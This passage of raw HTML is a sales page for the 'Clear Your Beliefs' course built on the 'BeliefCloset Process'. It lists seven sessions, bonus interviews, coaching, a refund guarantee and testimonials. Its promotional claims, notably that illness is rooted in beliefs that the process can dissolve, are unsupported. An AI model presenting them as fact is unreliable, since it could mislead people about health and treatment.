way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\r\n\r\nIn gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n\r\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\r\n\r\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n<strong> In Session 1, you will:</strong>\r\n\r\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\r\nLearn which ones keep you stuck, preventing you from having what you want in life\r\nExperience a process that returns you to your True Self, the home of inner joy and bliss\r\nBegin to work with, not against, your subconscious mind – where your beliefs reside\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\r\n\r\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n<strong> In Session 2, you will:</strong>\r\n\r\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\r\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\r\nSee your own magnificence through a new clear lens of your own beauty and joy\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\r\n\r\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\r\n\r\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\r\n\r\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\r\n\r\n<strong> In Session 3, you will:</strong>\r\n\r\nIdentify old beliefs that stand between you and creating the life you want\r\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\r\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\r\n\r\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n&nbsp;\r\n\r\n<strong> In Session 4, you will:</strong>\r\n\r\nLook deeply into the childhood patterns that enabled you to survive and thrive\r\nSee which of your beliefs now interfere with your intimate relationships\r\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\r\n\r\n<strong> In Session 5, you will:</strong>\r\n\r\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\r\nRemove beliefs that create stumbling blocks in the way of natural abundance\r\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\r\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\r\n\r\n<strong> In Session 6, you will:</strong>\r\n\r\nIdentify old beliefs that stand between you and vibrant health\r\nRecognize beliefs that make you vulnerable to disease and injury\r\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\r\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n<strong> In Session 7, you will:</strong>\r\n\r\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\r\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\r\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n\r\nBonus #1:  <strong>Love:  What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong>\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n\r\nBe called to awaken your already-powerful ability to create the life of your dreams\r\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\r\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\r\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\r\nLearn a process that can strengthen your power of intention\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #5:<strong> Change Your Beliefs eBook</strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\r\n\r\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\r\n\r\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\nBonus #6: <strong>Complete Transcripts of the Course</strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n&nbsp;\r\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n<a name="package"></a>\r\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\r\n&nbsp;\r\n\r\n<h1>Purchase Today and You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\r\n\r\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\r\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\r\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\r\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\r\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\r\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\r\n<strong>Optional:</strong> Professional Coaching Sessions.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\r\n<p style="text-align: center">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\r\n\r\n&nbsp;\r\n\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<h1>Praise for Lion and Clear Your Beliefs</h1>\r\n\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<strong>– G. J., software developer</strong>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<strong>~ T. L., Healer, Stamford, CT </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<strong>~ C.T., Performance and Life Coach</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<strong>– M.M., International Business Consultant</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\r\n\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and 